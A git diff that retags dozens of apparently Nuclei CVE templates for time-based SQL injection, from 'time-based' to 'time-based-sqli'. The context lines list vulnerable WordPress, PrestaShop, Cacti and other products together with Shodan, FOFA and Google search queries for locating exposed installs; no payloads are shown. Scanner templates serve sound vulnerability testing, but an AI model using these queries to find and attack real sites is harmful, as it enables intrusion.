tags: time-based,cve,cve2022,packetstorm,emerge,rce,nortekcontrol + tags: time-based-sqli,cve,cve2022,packetstorm,emerge,rce,nortekcontrol http: - raw: diff --git a/http/cves/2022/CVE-2022-31976.yaml b/http/cves/2022/CVE-2022-31976.yaml index 57fdd25599..74254745ee 100644 --- a/http/cves/2022/CVE-2022-31976.yaml +++ b/http/cves/2022/CVE-2022-31976.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system - tags: time-based,cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project + tags: time-based-sqli,cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project http: - raw: diff --git a/http/cves/2022/CVE-2022-31977.yaml b/http/cves/2022/CVE-2022-31977.yaml index 6efc570904..268fb85fd5 100644 --- a/http/cves/2022/CVE-2022-31977.yaml +++ b/http/cves/2022/CVE-2022-31977.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system - tags: time-based,cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project + tags: time-based-sqli,cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project http: - raw: diff --git a/http/cves/2022/CVE-2022-31978.yaml b/http/cves/2022/CVE-2022-31978.yaml index f9bbd3fe98..98237bd59b 100644 --- a/http/cves/2022/CVE-2022-31978.yaml +++ b/http/cves/2022/CVE-2022-31978.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system - tags: time-based,cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project + tags: time-based-sqli,cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project http: - raw: diff --git a/http/cves/2022/CVE-2022-33965.yaml b/http/cves/2022/CVE-2022-33965.yaml index 2701aef218..db39a92c1e 100644 --- a/http/cves/2022/CVE-2022-33965.yaml +++ b/http/cves/2022/CVE-2022-33965.yaml @@ -33,7 +33,7 @@ info: shodan-query: http.html:"wp-stats-manager" fofa-query: body="wp-stats-manager" google-query: inurl:"/wp-content/plugins/wp-stats-manager" - tags: time-based,cve2022,cve,wordpress,wp-plugin,wp,unauth,sqli,wp-stats-manager,plugins-market + tags: time-based-sqli,cve2022,cve,wordpress,wp-plugin,wp,unauth,sqli,wp-stats-manager,plugins-market http: - raw: diff --git a/http/cves/2022/CVE-2022-3768.yaml b/http/cves/2022/CVE-2022-3768.yaml index 100346d080..a5a2cce21b 100644 --- a/http/cves/2022/CVE-2022-3768.yaml +++ b/http/cves/2022/CVE-2022-3768.yaml @@ -29,7 +29,7 @@ info: vendor: wpsmartcontracts product: wpsmartcontracts framework: wordpress - tags: time-based,cve,cve2022,wp-smart-contracts,wpscan,wp-plugin,sqli,wordpress,wp,authenticated,wpsmartcontracts + tags: time-based-sqli,cve,cve2022,wp-smart-contracts,wpscan,wp-plugin,sqli,wordpress,wp,authenticated,wpsmartcontracts http: - raw: diff --git a/http/cves/2022/CVE-2022-3800.yaml b/http/cves/2022/CVE-2022-3800.yaml index 7d0914e32b..72f58edd29 100644 --- a/http/cves/2022/CVE-2022-3800.yaml +++ b/http/cves/2022/CVE-2022-3800.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: ibax product: go-ibax - tags: time-based,cve2022,cve,ibax,go-ibax,sqli + tags: time-based-sqli,cve2022,cve,ibax,go-ibax,sqli http: - raw: diff --git a/http/cves/2022/CVE-2022-40032.yaml b/http/cves/2022/CVE-2022-40032.yaml index dbd896729d..734887dc5d 100644 --- a/http/cves/2022/CVE-2022-40032.yaml +++ b/http/cves/2022/CVE-2022-40032.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: simple_task_managing_system_project product: simple_task_managing_system - tags: time-based,cve,cve2022,packetstorm,simple-task,stms,sqli,simple_task_managing_system_project + tags: time-based-sqli,cve,cve2022,packetstorm,simple-task,stms,sqli,simple_task_managing_system_project http: - raw: diff --git a/http/cves/2022/CVE-2022-4049.yaml b/http/cves/2022/CVE-2022-4049.yaml index 4a37fb4b28..11afd80c0e 100644 --- a/http/cves/2022/CVE-2022-4049.yaml +++ b/http/cves/2022/CVE-2022-4049.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/wp-user/ fofa-query: body=/wp-content/plugins/wp-user/ publicwww-query: /wp-content/plugins/wp-user/ - tags: time-based,cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-user,unauth,wp_user_project + tags: time-based-sqli,cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-user,unauth,wp_user_project http: - raw: diff --git a/http/cves/2022/CVE-2022-4050.yaml b/http/cves/2022/CVE-2022-4050.yaml index 12de61acfe..ab54d781e2 100644 --- a/http/cves/2022/CVE-2022-4050.yaml +++ b/http/cves/2022/CVE-2022-4050.yaml @@ -30,7 +30,7 @@ info: vendor: beardev product: joomsport framework: wordpress - tags: time-based,cve,cve2022,wpscan,wp-plugin,wp,joomsport-sports-league-results-management,wordpress,sqli,unauth,beardev + tags: time-based-sqli,cve,cve2022,wpscan,wp-plugin,wp,joomsport-sports-league-results-management,wordpress,sqli,unauth,beardev http: - raw: diff --git a/http/cves/2022/CVE-2022-4059.yaml b/http/cves/2022/CVE-2022-4059.yaml index e8cb84f659..b513a6baef 100644 --- a/http/cves/2022/CVE-2022-4059.yaml +++ b/http/cves/2022/CVE-2022-4059.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/cryptocurrency-widgets-pack/ fofa-query: body=/wp-content/plugins/cryptocurrency-widgets-pack/ publicwww-query: /wp-content/plugins/cryptocurrency-widgets-pack/ - tags: time-based,cve,cve2022,wp,wp-plugin,wordpress,wpscan,sqli,blocksera + tags: time-based-sqli,cve,cve2022,wp,wp-plugin,wordpress,wpscan,sqli,blocksera http: - raw: diff --git a/http/cves/2022/CVE-2022-4117.yaml b/http/cves/2022/CVE-2022-4117.yaml index ca6e099de9..d0354c3393 100644 --- a/http/cves/2022/CVE-2022-4117.yaml +++ b/http/cves/2022/CVE-2022-4117.yaml @@ -30,7 +30,7 @@ info: vendor: iws-geo-form-fields_project product: iws-geo-form-fields framework: wordpress - tags: time-based,cve,cve2022,sqli,wordpress,wp-plugin,wp,iws-geo-form-fields,wpscan,iws-geo-form-fields_project + tags: time-based-sqli,cve,cve2022,sqli,wordpress,wp-plugin,wp,iws-geo-form-fields,wpscan,iws-geo-form-fields_project http: - raw: diff --git a/http/cves/2022/CVE-2022-44290.yaml b/http/cves/2022/CVE-2022-44290.yaml index deedd1396a..3b9aded4e6 100644 --- a/http/cves/2022/CVE-2022-44290.yaml +++ b/http/cves/2022/CVE-2022-44290.yaml @@ -24,7 +24,7 @@ info: max-request: 2 vendor: webtareas_project product: webtareas - tags: time-based,cve,cve2022,sqli,webtareas,authenticated,intrusive,webtareas_project + tags: time-based-sqli,cve,cve2022,sqli,webtareas,authenticated,intrusive,webtareas_project http: - raw: diff --git a/http/cves/2022/CVE-2022-44291.yaml b/http/cves/2022/CVE-2022-44291.yaml index eb926999cb..c13f8fabb4 100644 --- a/http/cves/2022/CVE-2022-44291.yaml +++ b/http/cves/2022/CVE-2022-44291.yaml @@ -24,7 +24,7 @@ info: max-request: 2 vendor: webtareas_project product: webtareas - tags: time-based,cve,cve2022,sqli,webtareas,authenticated,intrusive,webtareas_project + tags: time-based-sqli,cve,cve2022,sqli,webtareas,authenticated,intrusive,webtareas_project http: - raw: diff --git a/http/cves/2022/CVE-2022-45805.yaml b/http/cves/2022/CVE-2022-45805.yaml index d4887a6353..8a7965ed39 100644 --- a/http/cves/2022/CVE-2022-45805.yaml +++ b/http/cves/2022/CVE-2022-45805.yaml @@ -29,7 +29,7 @@ info: vendor: paytm product: payment_gateway framework: wordpress - tags: time-based,cve,cve2022,sqli,wordpress,wp-plugin,wp,paytm-payments,authenticated,paytm + tags: time-based-sqli,cve,cve2022,sqli,wordpress,wp-plugin,wp,paytm-payments,authenticated,paytm http: - raw: diff --git a/http/cves/2023/CVE-2023-0261.yaml b/http/cves/2023/CVE-2023-0261.yaml index fdeeec8675..0a994785d5 100644 --- a/http/cves/2023/CVE-2023-0261.yaml +++ b/http/cves/2023/CVE-2023-0261.yaml @@ -28,7 +28,7 @@ info: vendor: ljapps product: wp_tripadvisor_review_slider framework: wordpress - tags: time-based,cve2023,cve,wordpress,wp,wp-tripadvisor-review-slider,auth,sqli,wp-plugin,wpscan,ljapps + tags: time-based-sqli,cve2023,cve,wordpress,wp,wp-tripadvisor-review-slider,auth,sqli,wp-plugin,wpscan,ljapps http: - raw: diff --git a/http/cves/2023/CVE-2023-0600.yaml b/http/cves/2023/CVE-2023-0600.yaml index 38a169edc1..15444215dc 100644 --- a/http/cves/2023/CVE-2023-0600.yaml +++ b/http/cves/2023/CVE-2023-0600.yaml @@ -29,7 +29,7 @@ info: fofa-query: body="wp-stats-manager" google-query: inurl:"/wp-content/plugins/wp-stats-manager" public-www: /wp-content/plugins/wp-stats-manager/ - tags: time-based,cve,cve2023,wp,wp-plugin,wordpress,wpscan,unauth,wp-stats-manager,sqli,plugins-market + tags: time-based-sqli,cve,cve2023,wp,wp-plugin,wordpress,wpscan,unauth,wp-stats-manager,sqli,plugins-market variables: str: '{{rand_int(100000, 999999)}}' diff --git a/http/cves/2023/CVE-2023-0630.yaml b/http/cves/2023/CVE-2023-0630.yaml index d9a32e13b5..fa599070a8 100644 --- a/http/cves/2023/CVE-2023-0630.yaml +++ b/http/cves/2023/CVE-2023-0630.yaml @@ -29,7 +29,7 @@ info: vendor: wp-slimstat product: slimstat_analytics framework: wordpress - tags: time-based,cve2023,cve,wpscan,wp-slimstat,wp,wp-plugin,sqli,wordpress,authenticated + tags: time-based-sqli,cve2023,cve,wpscan,wp-slimstat,wp,wp-plugin,sqli,wordpress,authenticated http: - raw: diff --git a/http/cves/2023/CVE-2023-0900.yaml b/http/cves/2023/CVE-2023-0900.yaml index 1c61c675ed..7016fbd79a 100644 --- a/http/cves/2023/CVE-2023-0900.yaml +++ b/http/cves/2023/CVE-2023-0900.yaml @@ -27,7 +27,7 @@ info: shodan-query: http.html:wp-content/plugins/ap-pricing-tables-lite fofa-query: body=wp-content/plugins/ap-pricing-tables-lite publicwww-query: "wp-content/plugins/ap-pricing-tables-lite" - tags: time-based,cve2023,cve,sqli,wordpress,wp-plugin,wp,authenticated,wpscan,ap-pricing-tables-lite,wpdevart + tags: time-based-sqli,cve2023,cve,sqli,wordpress,wp-plugin,wp,authenticated,wpscan,ap-pricing-tables-lite,wpdevart http: - raw: diff --git a/http/cves/2023/CVE-2023-1408.yaml b/http/cves/2023/CVE-2023-1408.yaml index 01358f2b22..73f73628b1 100644 --- a/http/cves/2023/CVE-2023-1408.yaml +++ b/http/cves/2023/CVE-2023-1408.yaml @@ -27,7 +27,7 @@ info: shodan-query: http.html:/wp-content/plugins/video-list-manager/ fofa-query: body=/wp-content/plugins/video-list-manager/ publicwww-query: /wp-content/plugins/video-list-manager/ - tags: time-based,cve,cve2023,wpscan,sqli,wordpress,wp-plugin,wp,authenticated,video_list_manager_project + tags: time-based-sqli,cve,cve2023,wpscan,sqli,wordpress,wp-plugin,wp,authenticated,video_list_manager_project http: - raw: diff --git a/http/cves/2023/CVE-2023-1730.yaml b/http/cves/2023/CVE-2023-1730.yaml index bcf0192be4..772bda0bcb 100644 --- a/http/cves/2023/CVE-2023-1730.yaml +++ b/http/cves/2023/CVE-2023-1730.yaml @@ -28,7 +28,7 @@ info: vendor: supportcandy product: supportcandy framework: wordpress - tags: time-based,cve2023,cve,sqli,wpscan,wordpress,supportcandy,unauth + tags: time-based-sqli,cve2023,cve,sqli,wpscan,wordpress,supportcandy,unauth http: - raw: diff --git a/http/cves/2023/CVE-2023-2130.yaml b/http/cves/2023/CVE-2023-2130.yaml index 8ee1ca8409..bf443f2260 100644 --- a/http/cves/2023/CVE-2023-2130.yaml +++ b/http/cves/2023/CVE-2023-2130.yaml @@ -29,7 +29,7 @@ info: max-request: 1 vendor: purchase_order_management_system_project product: purchase_order_management_system - tags: time-based,cve2023,cve,sqli,purchase-order-management-system,purchase_order_management_system_project + tags: time-based-sqli,cve2023,cve,sqli,purchase-order-management-system,purchase_order_management_system_project http: - method: GET diff --git a/http/cves/2023/CVE-2023-23488.yaml b/http/cves/2023/CVE-2023-23488.yaml index 821ca78714..d640878909 100644 --- a/http/cves/2023/CVE-2023-23488.yaml +++ b/http/cves/2023/CVE-2023-23488.yaml @@ -34,7 +34,7 @@ info: fofa-query: body=/wp-content/plugins/paid-memberships-pro/ publicwww-query: /wp-content/plugins/paid-memberships-pro/ google-query: inurl:"/wp-content/plugins/paid-memberships-pro" - tags: time-based,cve2023,cve,paid-memberships-pro,wordpress,tenable,packetstorm,wp-plugin,sqli,wp,strangerstudios + tags: time-based-sqli,cve2023,cve,paid-memberships-pro,wordpress,tenable,packetstorm,wp-plugin,sqli,wp,strangerstudios http: - raw: diff --git a/http/cves/2023/CVE-2023-23489.yaml b/http/cves/2023/CVE-2023-23489.yaml index a983c62260..7173b799d2 100644 --- a/http/cves/2023/CVE-2023-23489.yaml +++ b/http/cves/2023/CVE-2023-23489.yaml @@ -30,7 +30,7 @@ info: vendor: sandhillsdev product: easy_digital_downloads framework: wordpress - tags: time-based,cve,cve2023,easy-digital-downloads,unauth,wpscan,wordpress,wp,wp-plugin,sqli,tenable,sandhillsdev + tags: time-based-sqli,cve,cve2023,easy-digital-downloads,unauth,wpscan,wordpress,wp,wp-plugin,sqli,tenable,sandhillsdev http: - raw: diff --git a/http/cves/2023/CVE-2023-27032.yaml b/http/cves/2023/CVE-2023-27032.yaml index 119c1d8d5e..5a9250c6f9 100644 --- a/http/cves/2023/CVE-2023-27032.yaml +++ b/http/cves/2023/CVE-2023-27032.yaml @@ -24,7 +24,7 @@ info: product: "popup_module_\\(on_entering\\,_exit_popup\\,_add_product\\)_and_newsletter" framework: prestashop shodan-query: "http.component:\"prestashop\"" - tags: time-based,cve,cve2023,sqli,prestashop,advancedpopupcreator,idnovate + tags: time-based-sqli,cve,cve2023,sqli,prestashop,advancedpopupcreator,idnovate http: - raw: diff --git a/http/cves/2023/CVE-2023-27034.yaml b/http/cves/2023/CVE-2023-27034.yaml index beec74393e..ca487aa605 100644 --- a/http/cves/2023/CVE-2023-27034.yaml +++ b/http/cves/2023/CVE-2023-27034.yaml @@ -29,7 +29,7 @@ info: vendor: joommasters product: jms_blog framework: prestashop - tags: time-based,cve2023,cve,prestashop,prestashop-module,sqli,intrusive,joommasters + tags: time-based-sqli,cve2023,cve,prestashop,prestashop-module,sqli,intrusive,joommasters flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-27847.yaml b/http/cves/2023/CVE-2023-27847.yaml index 6b1df7cc96..b6a2fd23c6 100644 --- a/http/cves/2023/CVE-2023-27847.yaml +++ b/http/cves/2023/CVE-2023-27847.yaml @@ -24,7 +24,7 @@ info: framework: prestashop shodan-query: html:"/xipblog" fofa-query: app="Prestashop" - tags: time-based,cve,cve2023,prestashop,sqli,xipblog + tags: time-based-sqli,cve,cve2023,prestashop,sqli,xipblog flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-28662.yaml b/http/cves/2023/CVE-2023-28662.yaml index 77078b1491..75db515379 100644 --- a/http/cves/2023/CVE-2023-28662.yaml +++ b/http/cves/2023/CVE-2023-28662.yaml @@ -30,7 +30,7 @@ info: framework: wordpress shodan-query: http.html:"/wp-content/plugins/gift-voucher/" fofa-query: "body=\"/wp-content/plugins/gift-voucher/\"" - tags: time-based,cve,cve2023,wordpress,wp,wp-plugin,sqli,unauth,gift-voucher,codemenschen + tags: time-based-sqli,cve,cve2023,wordpress,wp,wp-plugin,sqli,unauth,gift-voucher,codemenschen flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-30150.yaml b/http/cves/2023/CVE-2023-30150.yaml index 89dd0742b0..65ad42d33f 100644 --- a/http/cves/2023/CVE-2023-30150.yaml +++ b/http/cves/2023/CVE-2023-30150.yaml @@ -32,7 +32,7 @@ info: shodan-query: - http.component:"Prestashop" - http.component:"prestashop" - tags: time-based,cve2023,cve,prestashop,sqli,leotheme + tags: time-based-sqli,cve2023,cve,prestashop,sqli,leotheme http: - raw: diff --git a/http/cves/2023/CVE-2023-3077.yaml b/http/cves/2023/CVE-2023-3077.yaml index 2ace47fb43..319eb0f9db 100644 --- a/http/cves/2023/CVE-2023-3077.yaml +++ b/http/cves/2023/CVE-2023-3077.yaml @@ -29,7 +29,7 @@ info: publicwww-query: "/wp-content/plugins/mstore-api/" shodan-query: http.html:/wp-content/plugins/mstore-api/ fofa-query: body=/wp-content/plugins/mstore-api/ - tags: time-based,cve,cve2023,wpscan,wordpress,wp-plugin,wp,mstore-api,sqli,inspireui + tags: time-based-sqli,cve,cve2023,wpscan,wordpress,wp-plugin,wp,mstore-api,sqli,inspireui flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-34751.yaml b/http/cves/2023/CVE-2023-34751.yaml index 1a8035c6bc..12289ca986 100644 --- a/http/cves/2023/CVE-2023-34751.yaml +++ b/http/cves/2023/CVE-2023-34751.yaml @@ -26,7 +26,7 @@ info: fofa-query: - "Powered by bloofoxCMS" - powered by bloofoxcms - tags: time-based,cve2023,cve,sqli,bloofox,authenticated + tags: time-based-sqli,cve2023,cve,sqli,bloofox,authenticated http: - raw: diff --git a/http/cves/2023/CVE-2023-34752.yaml b/http/cves/2023/CVE-2023-34752.yaml index 5b043d0923..5139987619 100644 --- a/http/cves/2023/CVE-2023-34752.yaml +++ b/http/cves/2023/CVE-2023-34752.yaml @@ -28,7 +28,7 @@ info: fofa-query: - "Powered by bloofoxCMS" - powered by bloofoxcms - tags: time-based,cve,cve2023,sqli,bloofox,authenticated + tags: time-based-sqli,cve,cve2023,sqli,bloofox,authenticated http: - raw: diff --git a/http/cves/2023/CVE-2023-34753.yaml b/http/cves/2023/CVE-2023-34753.yaml index 7f5f52b00a..54f2ec6c2b 100644 --- a/http/cves/2023/CVE-2023-34753.yaml +++ b/http/cves/2023/CVE-2023-34753.yaml @@ -26,7 +26,7 @@ info: fofa-query: - "Powered by bloofoxCMS" - powered by bloofoxcms - tags: time-based,cve,cve2023,sqli,bloofox,authenticated + tags: time-based-sqli,cve,cve2023,sqli,bloofox,authenticated http: - raw: diff --git a/http/cves/2023/CVE-2023-34754.yaml b/http/cves/2023/CVE-2023-34754.yaml index 2c488596c8..b7788d7f3c 100644 --- a/http/cves/2023/CVE-2023-34754.yaml +++ b/http/cves/2023/CVE-2023-34754.yaml @@ -26,7 +26,7 @@ info: verified: true vendor: bloofox product: bloofoxcms - tags: time-based,cve,cve2023,bloofox,sqli,authenticated + tags: time-based-sqli,cve,cve2023,bloofox,sqli,authenticated http: - raw: diff --git a/http/cves/2023/CVE-2023-34755.yaml b/http/cves/2023/CVE-2023-34755.yaml index 54d90265f6..001aa39287 100644 --- a/http/cves/2023/CVE-2023-34755.yaml +++ b/http/cves/2023/CVE-2023-34755.yaml @@ -26,7 +26,7 @@ info: fofa-query: - "Powered by bloofoxCMS" - powered by bloofoxcms - tags: time-based,cve,cve2023,sqli,bloofox,authenticated + tags: time-based-sqli,cve,cve2023,sqli,bloofox,authenticated http: - raw: diff --git a/http/cves/2023/CVE-2023-34756.yaml b/http/cves/2023/CVE-2023-34756.yaml index 0a69d87c04..067c20a8ee 100644 --- a/http/cves/2023/CVE-2023-34756.yaml +++ b/http/cves/2023/CVE-2023-34756.yaml @@ -26,7 +26,7 @@ info: fofa-query: - "Powered by bloofoxCMS" - powered by bloofoxcms - tags: time-based,cve,cve2023,sqli,bloofox,authenticated + tags: time-based-sqli,cve,cve2023,sqli,bloofox,authenticated http: - raw: diff --git a/http/cves/2023/CVE-2023-36284.yaml b/http/cves/2023/CVE-2023-36284.yaml index 9e55c66836..96116ee64f 100644 --- a/http/cves/2023/CVE-2023-36284.yaml +++ b/http/cves/2023/CVE-2023-36284.yaml @@ -29,7 +29,7 @@ info: fofa-query: - "title=\"QloApps\"" - title="qloapps" - tags: time-based,cve,cve2023,qloapps,sqli,webkul + tags: time-based-sqli,cve,cve2023,qloapps,sqli,webkul flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-39361.yaml b/http/cves/2023/CVE-2023-39361.yaml index 6d2b4ecce7..8aab71fa9c 100644 --- a/http/cves/2023/CVE-2023-39361.yaml +++ b/http/cves/2023/CVE-2023-39361.yaml @@ -39,7 +39,7 @@ info: google-query: - intitle:"cacti" - intitle:"login to cacti" - tags: time-based,cve2023,cve,cacti,sqli + tags: time-based-sqli,cve2023,cve,cacti,sqli http: - raw: diff --git a/http/cves/2023/CVE-2023-39650.yaml b/http/cves/2023/CVE-2023-39650.yaml index 610de931af..468ce07fc7 100644 --- a/http/cves/2023/CVE-2023-39650.yaml +++ b/http/cves/2023/CVE-2023-39650.yaml @@ -23,7 +23,7 @@ info: verified: true framework: prestashop shodan-query: html:"/tvcmsblog" - tags: time-based,cve,cve2023,prestashop,sqli,tvcmsblog + tags: time-based-sqli,cve,cve2023,prestashop,sqli,tvcmsblog http: - raw: diff --git a/http/cves/2023/CVE-2023-39796.yaml b/http/cves/2023/CVE-2023-39796.yaml index 9cc3f5b905..f3f50a6186 100644 --- a/http/cves/2023/CVE-2023-39796.yaml +++ b/http/cves/2023/CVE-2023-39796.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: wbce product: wbce_cms - tags: time-based,cve,cve2023,sqli,wbce,intrusive + tags: time-based-sqli,cve,cve2023,sqli,wbce,intrusive http: - raw: diff --git a/http/cves/2023/CVE-2023-43374.yaml b/http/cves/2023/CVE-2023-43374.yaml index b9df11b85e..aa8fc1c581 100644 --- a/http/cves/2023/CVE-2023-43374.yaml +++ b/http/cves/2023/CVE-2023-43374.yaml @@ -34,7 +34,7 @@ info: - title="hoteldruid" - icon_hash=-1521640213 google-query: intitle:"hoteldruid" - tags: time-based,cve,cve2023,hoteldruid,cms,sqli,digitaldruid + tags: time-based-sqli,cve,cve2023,hoteldruid,cms,sqli,digitaldruid flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-45375.yaml b/http/cves/2023/CVE-2023-45375.yaml index 3367d97fc7..9d55188a7d 100644 --- a/http/cves/2023/CVE-2023-45375.yaml +++ b/http/cves/2023/CVE-2023-45375.yaml @@ -23,7 +23,7 @@ info: product: pireospay framework: prestashop shodan-query: "http.component:\"prestashop\"" - tags: time-based,cve,cve2023,sqli,prestashop,pireospay,01generator + tags: time-based-sqli,cve,cve2023,sqli,prestashop,pireospay,01generator flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-46347.yaml b/http/cves/2023/CVE-2023-46347.yaml index b4b51bdd3d..a414583b38 100644 --- a/http/cves/2023/CVE-2023-46347.yaml +++ b/http/cves/2023/CVE-2023-46347.yaml @@ -24,7 +24,7 @@ info: product: ndk_steppingpack framework: prestashop shodan-query: http.component:"prestashop" - tags: time-based,cve,cve2023,sqli,prestashop,ndk_steppingpack,ndkdesign + tags: time-based-sqli,cve,cve2023,sqli,prestashop,ndk_steppingpack,ndkdesign http: - raw: diff --git a/http/cves/2023/CVE-2023-48084.yaml b/http/cves/2023/CVE-2023-48084.yaml index 2e8fe811a6..40b2d4ac48 100644 --- a/http/cves/2023/CVE-2023-48084.yaml +++ b/http/cves/2023/CVE-2023-48084.yaml @@ -34,7 +34,7 @@ info: - title="nagios xi" - app="nagios-xi" google-query: intitle:"nagios xi" - tags: time-based,cve,cve2023,nagiosxi,sqli,authenticated,nagios + tags: time-based-sqli,cve,cve2023,nagiosxi,sqli,authenticated,nagios http: - raw: diff --git a/http/cves/2023/CVE-2023-4974.yaml b/http/cves/2023/CVE-2023-4974.yaml index 69867467fb..cdd8e1af55 100644 --- a/http/cves/2023/CVE-2023-4974.yaml +++ b/http/cves/2023/CVE-2023-4974.yaml @@ -29,7 +29,7 @@ info: - html:"Academy LMS" - http.html:"academy lms" fofa-query: body="academy lms" - tags: time-based,cve,cve2023,packetstorm,sqli,academy,lms,creativeitem + tags: time-based-sqli,cve,cve2023,packetstorm,sqli,academy,lms,creativeitem http: - raw: diff --git a/http/cves/2023/CVE-2023-6063.yaml b/http/cves/2023/CVE-2023-6063.yaml index 95777bc871..209ca6b00d 100644 --- a/http/cves/2023/CVE-2023-6063.yaml +++ b/http/cves/2023/CVE-2023-6063.yaml @@ -29,7 +29,7 @@ info: shodan-query: "http.html:/wp-content/plugins/wp-fastest-cache/" fofa-query: "body=/wp-content/plugins/wp-fastest-cache/" publicwww-query: "/wp-content/plugins/wp-fastest-cache/" - tags: time-based,cve,cve2023,wp-fastest-cache,wpscan,wordpress,wp-plugin,sqli,wpfastestcache + tags: time-based-sqli,cve,cve2023,wp-fastest-cache,wpscan,wordpress,wp-plugin,sqli,wpfastestcache flow: | if (http(1)) { for (let i = 0; i < 2; i++) { diff --git a/http/cves/2023/CVE-2023-6567.yaml b/http/cves/2023/CVE-2023-6567.yaml index cad1da1aa3..cae140f0a7 100644 --- a/http/cves/2023/CVE-2023-6567.yaml +++ b/http/cves/2023/CVE-2023-6567.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.html:/wp-content/plugins/learnpress fofa-query: body=/wp-content/plugins/learnpress publicwww-query: "/wp-content/plugins/learnpress" - tags: time-based,wpscan,cve,cve2023,wp,wp-plugin,wordpress,learnpress,sqli,thimpress + tags: time-based-sqli,wpscan,cve,cve2023,wp,wp-plugin,wordpress,learnpress,sqli,thimpress http: - raw: diff --git a/http/cves/2024/CVE-2024-1061.yaml b/http/cves/2024/CVE-2024-1061.yaml index 9cf3c01a58..43aeda4f81 100644 --- a/http/cves/2024/CVE-2024-1061.yaml +++ b/http/cves/2024/CVE-2024-1061.yaml @@ -31,7 +31,7 @@ info: product: html5_video_player framework: wordpress fofa-query: "\"wordpress\" && body=\"html5-video-player\"" - tags: time-based,cve,cve2024,wp,wordpress,wp-plugin,sqli,html5-video-player,bplugins + tags: time-based-sqli,cve,cve2024,wp,wordpress,wp-plugin,sqli,html5-video-player,bplugins http: - raw: diff --git a/http/cves/2024/CVE-2024-1071.yaml b/http/cves/2024/CVE-2024-1071.yaml index d28c323a36..d72035437a 100644 --- a/http/cves/2024/CVE-2024-1071.yaml +++ b/http/cves/2024/CVE-2024-1071.yaml @@ -30,7 +30,7 @@ info: zoomeye-query: app:"WordPress Ultimate Member Plugin" product: ultimate_member vendor: ultimatemember - tags: time-based,cve,cve2024,ultimate-member,wpscan,wordpress,wp-plugin,sqli + tags: time-based-sqli,cve,cve2024,ultimate-member,wpscan,wordpress,wp-plugin,sqli http: - raw: diff --git a/http/cves/2024/CVE-2024-1512.yaml b/http/cves/2024/CVE-2024-1512.yaml index c0e1bc3e9c..15a9c7b4e9 100644 --- a/http/cves/2024/CVE-2024-1512.yaml +++ b/http/cves/2024/CVE-2024-1512.yaml @@ -25,7 +25,7 @@ info: product: masterstudy_lms framework: wordpress fofa-query: body="wp-content/plugins/masterstudy-lms-learning-management-system/" - tags: time-based,cve,cve2024,sqli,wp-plugin,wordpress + tags: time-based-sqli,cve,cve2024,sqli,wp-plugin,wordpress http: - raw: diff --git a/http/cves/2024/CVE-2024-1698.yaml b/http/cves/2024/CVE-2024-1698.yaml index 2086b636e4..283322f02d 100644 --- a/http/cves/2024/CVE-2024-1698.yaml +++ b/http/cves/2024/CVE-2024-1698.yaml @@ -25,7 +25,7 @@ info: fofa-query: body="/wp-content/plugins/notificationx" product: notificationx vendor: wpdeveloper - tags: time-based,cve,cve2024,wpscan,wordpress,wp-plugin,notificationx,sqli + tags: time-based-sqli,cve,cve2024,wpscan,wordpress,wp-plugin,notificationx,sqli http: - raw: diff --git a/http/cves/2024/CVE-2024-2621.yaml b/http/cves/2024/CVE-2024-2621.yaml index 821bd10030..cee935f338 100644 --- a/http/cves/2024/CVE-2024-2621.yaml +++ b/http/cves/2024/CVE-2024-2621.yaml @@ -24,7 +24,7 @@ info: verified: true max-request: 1 fofa-query: body="app/structure/departments.php" || app="指挄调ćșŠçźĄç†ćčłć°" - tags: time-based,cve,cve2024,sqli,fujian,rce + tags: time-based-sqli,cve,cve2024,sqli,fujian,rce http: - raw: diff --git a/http/cves/2024/CVE-2024-27956.yaml b/http/cves/2024/CVE-2024-27956.yaml index 090e13fced..58bc409142 100644 --- a/http/cves/2024/CVE-2024-27956.yaml +++ b/http/cves/2024/CVE-2024-27956.yaml @@ -25,7 +25,7 @@ info: verified: true max-request: 1 publicwww-query: "wp-content/plugins/wp-automatic" - tags: time-based,cve,cve2024,sqli,wordpress,wpscan,wp-automatic + tags: time-based-sqli,cve,cve2024,sqli,wordpress,wpscan,wp-automatic http: - raw: diff --git a/http/cves/2024/CVE-2024-2876.yaml b/http/cves/2024/CVE-2024-2876.yaml index ad04da61ec..6153ca2d40 100644 --- a/http/cves/2024/CVE-2024-2876.yaml +++ b/http/cves/2024/CVE-2024-2876.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 publicwww-query: "/wp-content/plugins/email-subscribers/" - tags: time-based,cve,cve2024,wp,wordpress,wp-plugin,sqli,email-subscribers,wpscan + tags: time-based-sqli,cve,cve2024,wp,wordpress,wp-plugin,sqli,email-subscribers,wpscan http: - raw: diff --git a/http/cves/2024/CVE-2024-2879.yaml b/http/cves/2024/CVE-2024-2879.yaml index 703662cf31..31f48e7417 100644 --- a/http/cves/2024/CVE-2024-2879.yaml +++ b/http/cves/2024/CVE-2024-2879.yaml @@ -28,7 +28,7 @@ info: product: layerslider framework: wordpress publicwww-query: "/wp-content/plugins/LayerSlider/" - tags: 